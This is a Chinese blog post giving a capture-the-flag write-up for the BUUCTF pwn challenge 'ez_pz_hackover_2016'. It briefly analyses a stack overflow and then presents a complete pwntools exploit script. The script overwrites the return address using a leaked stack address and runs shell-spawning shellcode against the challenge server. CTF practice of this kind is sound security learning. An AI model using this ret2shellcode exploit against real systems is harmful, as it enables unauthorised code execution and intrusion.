BUUCTF pwn——ez_pz_hackover_2016

最新推荐文章于 2024-07-26 21:38:00 发布
最新推荐文章于 2024-07-26 21:38:00 发布
阅读量153 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130427543
版权

checksec

在这里插入图片描述

运行

直接输入就行,crashme会导致段错误
在这里插入图片描述

ida

main函数里的chall对输入校验,通过则运行vuln

在这里插入图片描述

vuln存在溢出

在这里插入图片描述

利用思路

ret2shellcode

代码

'''
@Author       : 白银
@Date         : 2023-04-28 09:35:28
@LastEditors  : 白银
@LastEditTime : 2023-04-28 15:18:40
@FilePath     : /pwn/ez_pz_hackover_2016.py
@Description  : https://buuoj.cn/challenges#ez_pz_hackover_2016
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './ez_pz_hackover_2016'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 27848)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

io.recvuntil('Yippie, lets crash: ')
s_addr = int(io.recvuntil('\n'), 16) # 程序会把s的地址带出来

payload1 = flat([asm(shellcraft.sh())])
payload = flat([b'crashme\x00'.ljust(0x16 + 0x4, b'\x00'), (s_addr-0x1c), payload1]) # 在程序栈上构造出stack frame结构,从而实现从一个缺陷的漏洞点到达shellcode
io.sendline(payload)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ez_pz_hackover_2016
m0_52231248的博客
11-18 147
ez_pz_hackover_2016 Checksec: Ida: Fgets会读取我们的输入但存在一个strlen检查,我们知道strlen在读入/x00就会停止。 同时当我们的输入包含crashme的时候会进入vlun函数, Vlun函数里的memcpy会拷贝我们之前的输入,存在溢出 所以我们只需要构造payload=crashme/x00+偏移+返回地址+shellcode就行了 Crashme/X00到ebp的偏移: 0xffffcd58-0xffffcd42=0x16
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2366
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
[BUUCTF-pwn]——ez_pz_hackover_2016
Y_peak的博客
02-15 336
[BUUCTF-pwn]——ez_pz_hackover_2016 题目地址:https://buuoj.cn/challenges#ez_pz_hackover_2016 checksec一下,NX都没开,十有八九是让自己写shellcode了 在IDA中,main里面没什么可以看的. 在chall函数中发现,0x40C = 1036 > 1023无法栈溢出。不过总算找到可以写shellcode 的地方。 发现vuln函数,只要通过输入"crashme\x00"就可以绕过检查,执行vuln
ez_pz_hackover_2016及简单gdb调试寻找所需地址
最新发布
2301_81504456的博客
07-26 403
简单gdb调试和NX未打开下的ret2shellcode
3S软件
Zzzpiu的博客
12-29 455
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 433
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
BUUCTF ez_pz_hackover_2016[动态调试之初入门]
weixin_45441024的博客
01-26 550
BUUCTF ez_pz_hackover_2016[动态调试之初入门] 之前做题基本上都是放到IDA里面进行分析,所以在动态调试这方面一直有所欠缺,今天这道题就弥补了这个不足,真正地走进了栈题的动态调试 先check一下,发现什么保护都没有开,还是一个32位的程序,心里不免有些小激动,难道这题简单? 不管简单与否,我们都先运行一下,发现在输入之前回显给我们一个栈地址,并且这个地址不是固定的,所以这里一定会用到,拿小本本记下来,之后程序会将我们输入的东西打印出来 之后我们进到IDA来分析一下这个程序
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 226
BUUCTF 做题练习
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 979
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
memcpy
weixin_45959515的博客
08-26 178
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
buuctf ez_pz_hackover_2016
qq_73625550的博客
05-26 548
使用gdb调试来计算偏移,ret2shecllcode,栈溢出
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 423
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值